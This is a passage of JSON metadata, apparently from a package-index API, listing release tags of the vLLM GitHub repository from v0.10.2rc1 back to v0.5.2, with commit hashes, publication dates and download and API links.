llm/releases/tag/v0.10.2rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.2rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2rc1/manifests"},{"name":"v0.10.1.1","sha":"1da94e673c257373280026f75ceb4effac80e892","kind":"commit","published_at":"2025-08-20T20:39:42.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.1.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.1.1/manifests"},{"name":"v0.10.1","sha":"aab549870df50edf0512f0a59b574f692f546465","kind":"commit","published_at":"2025-08-18T22:27:58.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.1/manifests"},{"name":"v0.10.1rc1","sha":"0fc8fa751a4321d6531467537ff77cf3c1c70260","kind":"commit","published_at":"2025-08-17T22:56:07.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.1rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.1rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.1rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.1rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.1rc1/manifests"},{"name":"v0.10.0","sha":"6d8d0a24c02bfd84d46b3016b865a44f048ae84b","kind":"commit","published_at":"2025-07-24T04:51:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.0/manifests"},{"name":"v0.10.0rc2","sha":"6d8d0a24c02bfd84d46b3016b865a44f048ae84b","kind":"commit","published_at":"2025-07-24T04:51:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.0rc2/manifests"},{"name":"v0.10.0rc1","sha":"d1fb65bde367aa6e3d72520c84b60be3d1539917","kind":"commit","published_at":"2025-07-20T03:22:02.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.0rc1/manifests"},{"name":"v0.9.2","sha":"a5dd03c1ebc5e4f56f3c9d3dc0436e9c582c978f","kind":"commit","published_at":"2025-07-06T21:02:36.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.2/manifests"},{"name":"v0.9.2rc2","sha":"a5dd03c1ebc5e4f56f3c9d3dc0436e9c582c978f","kind":"commit","published_at":"2025-07-06T21:02:36.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.2rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.2rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.2rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.2rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.2rc2/manifests"},{"name":"v0.9.2rc1","sha":"2f2fcb31b81f6025a2cc3cb9fe5b95bd03a5861b","kind":"commit","published_at":"2025-07-03T21:41:13.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.2rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.2rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.2rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.2rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.2rc1/manifests"},{"name":"v0.9.1","sha":"b6553be1bc75f046b00046a4ad7576364d03c835","kind":"commit","published_at":"2025-06-10T13:51:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.1/manifests"},{"name":"v0.9.1rc2","sha":"b6553be1bc75f046b00046a4ad7576364d03c835","kind":"commit","published_at":"2025-06-10T13:51:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.1rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.1rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.1rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.1rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.1rc2/manifests"},{"name":"v0.9.1rc1","sha":"3a7cd627a86c61a6dbc8d365c2e3c921b94e9971","kind":"commit","published_at":"2025-06-09T23:41:51.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.1rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.1rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.1rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.1rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.1rc1/manifests"},{"name":"v0.9.0.1","sha":"5fbbfe9a4c13094ad72ed3d6b4ef208a7ddc0fd7","kind":"commit","published_at":"2025-05-30T15:50:58.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.0.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.0.1/manifests"},{"name":"v0.9.0","sha":"58738772410c5e0d60b61db39538a9b313d2d7ad","kind":"commit","published_at":"2025-05-27T16:05:37.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.9.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.9.0/manifests"},{"name":"v0.8.5.post1","sha":"3015d5634e74d59704e2b39bab0dbe2e6f86a38a","kind":"commit","published_at":"2025-05-02T18:02:48.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.5.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.5.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.5.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.5.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.5.post1/manifests"},{"name":"v0.8.5","sha":"ba41cc90e8ef7f236347b2f1599eec2cbb9e1f0d","kind":"commit","published_at":"2025-04-28T22:22:46.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"dc1b4a6f1300003ae27f033afbdff5e2683721ce","kind":"commit","published_at":"2025-04-14T02:13:38.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"296c6572dd1f76b31b93be19e550790afcfb8843","kind":"commit","published_at":"2025-04-06T04:10:57.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.3/manifests"},{"name":"v0.8.3rc1","sha":"63375f0cdb0073e466d9012aad1192c445a5fa64","kind":"commit","published_at":"2025-04-04T23:32:54.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.3rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.3rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.3rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.3rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.3rc1/manifests"},{"name":"v0.8.2","sha":"25f560a62c4f955672e2c6080b17ab3a48f96201","kind":"commit","published_at":"2025-03-25T04:04:41.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"61c7a1b856e32ef8b12c70abcb9fd9ad22619a13","kind":"commit","published_at":"2025-03-19T17:37:17.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"966f933ee1cd7c9a41db60de5c7ff98657005251","kind":"commit","published_at":"2025-03-18T17:51:10.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.0/manifests"},{"name":"v0.8.0rc2","sha":"37e380613220f607cb465fc15f72a4a033a98b23","kind":"commit","published_at":"2025-03-17T17:04:21.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.0rc2/manifests"},{"name":"v0.8.0rc1","sha":"8d6cf89526ff983b7eb74aad3903138004ae95cd","kind":"commit","published_at":"2025-03-17T05:00:20.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.8.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.8.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.8.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.8.0rc1/manifests"},{"name":"v0.7.3","sha":"ed6e9075d31e32c8548b480a47d1ffb77da1f54c","kind":"commit","published_at":"2025-02-20T14:47:01.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.7.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"0408efc6d0c17fba17b2be38d0d0f02e96d2bf9d","kind":"commit","published_at":"2025-02-06T07:23:50.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.7.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"4f4d427ac2cee0f8ff7f79103001f6617fa8989c","kind":"commit","published_at":"2025-02-01T07:46:57.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.7.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"5204ff5c3feeb96e8a6eea65dfcb78395f90d4d8","kind":"commit","published_at":"2025-01-27T05:26:44.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.7.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.7.0/manifests"},{"name":"v0.6.6.post1","sha":"2339d59f9260499599d60599f83978fad1827999","kind":"commit","published_at":"2024-12-27T06:23:29.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.6.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.6.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.6.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.6.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.6.post1/manifests"},{"name":"v0.6.6","sha":"f49777ba62b4926d0f8c100ab06edb03c5c10098","kind":"commit","published_at":"2024-12-27T00:09:44.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.6","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2d1b9baa8f57fc59912c7bcd07fd630fb9d72c9d","kind":"commit","published_at":"2024-12-17T20:26:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.5/manifests"},{"name":"v0.6.4.post1","sha":"a6221a144af772fd1a68fe7e627935dc53e81738","kind":"commit","published_at":"2024-11-15T17:48:07.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.4.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.4.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.4.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.4.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.4.post1/manifests"},{"name":"v0.6.4","sha":"02dbf30e9a4389b41d95dd595bfe1224592dd404","kind":"commit","published_at":"2024-11-15T07:31:52.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.4/manifests"},{"name":"v0.6.3.post1","sha":"a2c71c5405fdd8822956bcd785e72149c1cfb655","kind":"commit","published_at":"2024-10-17T17:25:06.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.3.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.3.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.3.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.3.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.3.post1/manifests"},{"name":"v0.6.3","sha":"fd47e57f4b0d5f7920903490bce13bc9e49d8dba","kind":"commit","published_at":"2024-10-14T18:57:47.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.3/manifests"},{"name":"v0.6.2","sha":"7193774b1ff8603ad5bf4598e5efba0d9a39b436","kind":"commit","published_at":"2024-09-25T21:46:22.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.2/manifests"},{"name":"v0.6.1.post2","sha":"9ba0817ff1eb514f51cc6de9cb8e16c98d6ee44f","kind":"commit","published_at":"2024-09-13T18:35:00.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.1.post2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.1.post2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.1.post2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.1.post2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.1.post2/manifests"},{"name":"v0.6.1.post1","sha":"acda0b35d00e733982aa4c1198f2bd381d368cb5","kind":"commit","published_at":"2024-09-13T04:39:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.1.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.1.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.1.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.1.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.1.post1/manifests"},{"name":"v0.6.1","sha":"3fd2b0d21cd9ec78de410fdf8aa1de840e9ad77a","kind":"commit","published_at":"2024-09-11T21:42:11.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.1/manifests"},{"name":"v0.6.0","sha":"32e7db25365415841ebc7c4215851743fbb1bad1","kind":"commit","published_at":"2024-09-04T23:34:27.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.6.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.6.0/manifests"},{"name":"v0.5.5","sha":"09c7792610ada9f88bbf87d32b472dd44bf23cc2","kind":"commit","published_at":"2024-08-23T18:35:33.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.5/manifests"},{"name":"v0.5.4","sha":"4db5176d9758b720b05460c50ace3c01026eb158","kind":"commit","published_at":"2024-08-05T21:39:48.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.4/manifests"},{"name":"v0.5.3.post1","sha":"38c4b7e863570a045308af814c72f4504297222e","kind":"commit","published_at":"2024-07-23T17:08:59.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.3.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.3.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.5.3.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.3.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.3.post1/manifests"},{"name":"v0.5.3","sha":"bb2fc08072db2d96e547407b4301fb6ba141d9d6","kind":"commit","published_at":"2024-07-23T07:00:08.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"4cf256ae7f8b0be8f06f6b85821e55d4f5bdaa13","kind":"commit","published_at":"2024-07-15T17:32:35.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":